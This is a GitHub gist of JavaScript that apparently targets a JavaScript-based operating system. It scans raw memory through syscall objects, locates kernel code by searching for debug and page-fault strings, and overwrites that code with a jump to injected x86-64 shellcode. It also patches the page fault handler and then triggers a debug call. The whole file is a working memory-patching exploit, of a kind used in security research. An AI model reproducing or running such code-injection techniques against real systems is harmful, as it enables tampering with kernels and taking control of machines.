Created
September 24, 2017 16:25
-
-
Save McSimp/d7a082de0e02afea51e35230e53cdb3b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
console.log("Starting"); | |
function findData(lookFor) { | |
var MEM_START_OFFSET = 1; | |
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(MEM_START_OFFSET, 0x7FFFFFFF).buffer()); | |
var locs = []; | |
for (var i = 0; i < 0x2000000; i++) { | |
var found = true; | |
for (var j = 0; j < lookFor.length; j++) { | |
if (memBuffer[i+j] != lookFor[j]) { | |
found = false; | |
break; | |
} | |
} | |
if (found) { | |
return (i + MEM_START_OFFSET); | |
} | |
} | |
return null; | |
} | |
function decToHex(d) { | |
var hex = d.toString(16); | |
hex = "00".substr(0, 2 - hex.length) + hex; | |
return hex; | |
} | |
function dumpMem(start, size) { | |
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(start, size).buffer()); | |
var outStr = ""; | |
for (var i = 0; i < size; i++) { | |
outStr += decToHex(memBuffer[i]); | |
} | |
return outStr; | |
} | |
function writeData(writeTo, data) { | |
var memBuffer = new Uint8Array(__SYSCALL.getSystemResources().memoryRange.block(writeTo, data.length).buffer()); | |
for (var i = 0; i < data.length; i++) { | |
memBuffer[i] = data[i]; | |
} | |
} | |
function writeMultipleData(writeTo, datas) { | |
var offset = 0; | |
for (var i = 0; i < datas.length; i++) { | |
writeData(writeTo + offset, datas[i]); | |
offset += datas[i].length; | |
} | |
} | |
function pointerToBytes(pointer) { | |
var result = []; | |
for (var i = 0; i < 4; i++) { | |
result.push((pointer >> (i*8)) & 0xFF); | |
} | |
return result; | |
} | |
var dbgStrAddr = findData(" --- DEBUG --- ".split('').map((char) => char.charCodeAt(0))); | |
console.log("Found debug string at: ", dbgStrAddr.toString(16)); | |
var dbgStrUsageAddr = findData(pointerToBytes(dbgStrAddr)); | |
console.log("Found debug string usage at: ", dbgStrUsageAddr.toString(16)); | |
var codeBuf = __SYSCALL.allocDMA(); | |
console.log("Allocated buffer for shellcode at: ", codeBuf.address.toString(16)); | |
/* | |
0: 48 c7 c3 00 00 e0 1c mov rbx,0x1ce00000 | |
7: ff e3 jmp rbx | |
*/ | |
var jmpData = [ | |
[0x48, 0xc7, 0xc3], pointerToBytes(codeBuf.address), | |
[0xff, 0xe3] | |
]; | |
writeMultipleData(dbgStrUsageAddr - 5, jmpData); | |
/* | |
0: 48 83 c4 08 add rsp,0x8 | |
4: 48 bf ef ee be ad de movabs rdi,0xdeadbeeeef | |
b: 00 00 00 | |
e: 48 c7 c3 78 56 34 12 mov rbx,0x12345678 | |
15: ff e3 jmp rbx | |
*/ | |
var shellcode = [ | |
[0x48, 0x83, 0xc4, 0x08], | |
[0x48, 0xbf, 0xef, 0xee, 0xbe, 0xad, 0xde, 0x00, 0x00, 0x00], | |
[0x48, 0xc7, 0xc3], pointerToBytes(dbgStrUsageAddr + 4), | |
[0xff, 0xe3] | |
]; | |
writeMultipleData(codeBuf.address, shellcode); | |
var invalidStrAddr = findData("Invalid Faulting address = %p".split('').map((char) => char.charCodeAt(0))); | |
console.log("Found page fault string at: ", invalidStrAddr.toString(16)); | |
var invalidStrUsageAddr = findData(pointerToBytes(invalidStrAddr)); | |
console.log("Found page fault string usage at: ", invalidStrUsageAddr.toString(16)); | |
// Set unconditional jump in page fault handler | |
writeData(invalidStrUsageAddr - 251, [0xEB]); | |
console.log("Finished writing shellcode"); | |
__SYSCALL.debug(); | |
console.log("Finished calling debug"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment